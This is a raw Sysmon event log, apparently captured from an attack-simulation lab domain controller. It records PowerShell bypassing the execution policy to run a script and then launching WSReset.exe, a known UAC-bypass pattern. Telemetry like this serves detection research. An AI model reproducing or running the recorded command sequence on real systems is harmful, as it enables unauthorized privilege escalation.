08:04:23.834{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.834{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.834{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.834{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.834{466BC892-F786-60EB-CA7D-00000000CF01}95087676Shell.Commands.ManagWindowsPowerShell\v1.0\powershell.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\shell32.dll+3cdcf|C:\Windows\System32\shell32.dll+3cc5c|C:\Windows\System32\shell32.dll+3c9ac|C:\Windows\System32\shell32.dll+122467|C:\Windows\System32\shell32.dll+1223c5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+38b30c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2d41f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+af11c7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c0449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64) 154100x80000000000000001053330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.842{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\System32\WSReset.exe10.0.14393.4169 
(rs1_release.210107-1130)This tool resets the Windows Store without changing account settings or deleting installed appsMicrosoft® Windows® Operating SystemMicrosoft CorporationWSReset.exe"C:\Windows\system32\WSReset.exe" C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=5181342124A0AB97F865A39581CE9C41,SHA256=FE7AF6AC7EA79AEA47BFF06035875DD1975590F78C31797526908C1A4877EE84,IMPHASH=279E04CF32068F56394D78D663C285A4{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\ws.ps1'" 10341000x80000000000000001053329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.566{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.566{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001053327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:04:23.534{466BC892-F786-60EB-CA7D-00000000CF01}9508\PSHost.132705506628667946.9508.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001053326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.486{466BC892-F786-60EB-CA7D-00000000CF01}9508ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_v3uxnjxo.1tw.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.470{466BC892-F786-60EB-CA7D-00000000CF01}9508ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_whinm5ur.fce.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001053324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.390{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_whinm5ur.fce.ps12021-07-12 08:04:23.390 10341000x80000000000000001053323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.359{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}950810124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.306{466BC892-F786-60EB-CA7D-00000000CF01}9508ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf746612.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.206{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.206{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.143{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A8C8F769D9D4B1045C3DECE4CAC3EC3,SHA256=426F1DE0404A00EA61FE72CA65210381613FC465255C3C9CB3F721CB8CFEB400,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.143{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5DC33BDFFA918AEF5054D9BDCD1FE627,SHA256=5CE6B0E382B3DD079D60F07BD39B1570BA3C6FBC4B29A90CC4B8DA72CFD94877,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.143{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.143{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.143{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.128{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 